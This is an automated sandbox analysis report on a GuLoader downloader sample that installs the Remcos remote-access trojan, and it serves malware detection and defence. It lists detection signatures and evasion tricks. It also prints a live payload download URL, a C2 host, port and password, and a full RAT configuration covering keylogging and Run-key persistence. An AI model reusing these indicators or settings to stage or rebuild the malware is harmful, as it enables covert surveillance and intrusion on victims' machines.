Windows Analysis Report
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe

Overview

General Information

Sample Name: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Analysis ID: 632533
MD5: c1863e820a135d468e9787f1f78970e2
SHA1: e0846c1117045f4ee73a6493e2207d4f27056b9e
SHA256: feb8a71e0b6bb912ce22c67275eba157fb10f626e18faeb5119789c7e89ecabd
Infos:

Detection

GuLoader, Remcos
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus detection for dropped file
Yara detected GuLoader
Installs a global keyboard hook
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Contains functionality to enumerate device drivers
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Found malware configuration
Source: 00000008.00000000.1148737503.0000000001660000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm"}
Source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "dwilsonson23.sytes.net:3013:1", "Assigned name": "D_wilson user2", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "ios.exe", "Startup value": "ahw", "Hide file": "Enable", "Mutex": "Remcos-V27VY7", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "", "Keylog folder": "", "Keylog file max size": "0"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Virustotal: Detection: 13% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe PID: 996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ios.exe PID: 8752, type: MEMORYSTR
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\install.vbs Avira: detection malicious, Label: VBS/Runner.VPD
Antivirus or Machine Learning detection for unpacked file
Source: 25.2.ios.exe.410c71.2.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 26.0.ios.exe.410c71.2.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 26.0.ios.exe.410c71.9.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 0.2.SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe.410c71.1.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 26.2.ios.exe.410c71.1.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Uses 32bit PE files
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: DIFXAPI.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source: Binary string: D:\corp\project\swnr\portaudio\build\msvc\x64\Release\portaudio_x64.pdb++ source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr
Source: Binary string: D:\corp\project\swnr\portaudio\build\msvc\x64\Release\portaudio_x64.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr
Source: Binary string: mshtml.pdb source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: DIFXAPI.pdbH source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source: Binary string: mshtml.pdbUGP source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\devapi\Win8Release\x64\bin\vm3ddevapi64-release.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 25_2_00405D74
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0040290B FindFirstFileW, 25_2_0040290B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0040699E FindFirstFileW,FindClose, 25_2_0040699E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 26_2_00405D74
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_0040290B FindFirstFileW, 26_2_0040290B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_0040699E FindFirstFileW,FindClose, 26_2_0040699E

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm
Source: Malware configuration extractor URLs: dwilsonson23.sytes.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DELTAHOST-ASUA DELTAHOST-ASUA
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/kdqkjtpbbdq1ma5od724n4arlrasmcfv/1653325275000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-68-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cf8qgqli4rihm7727e1v30p2jqpcricp/1653325350000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-68-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49772 -> 185.20.186.103:3013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1306554035.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1307073351.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1306554035.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1307073351.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0B
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
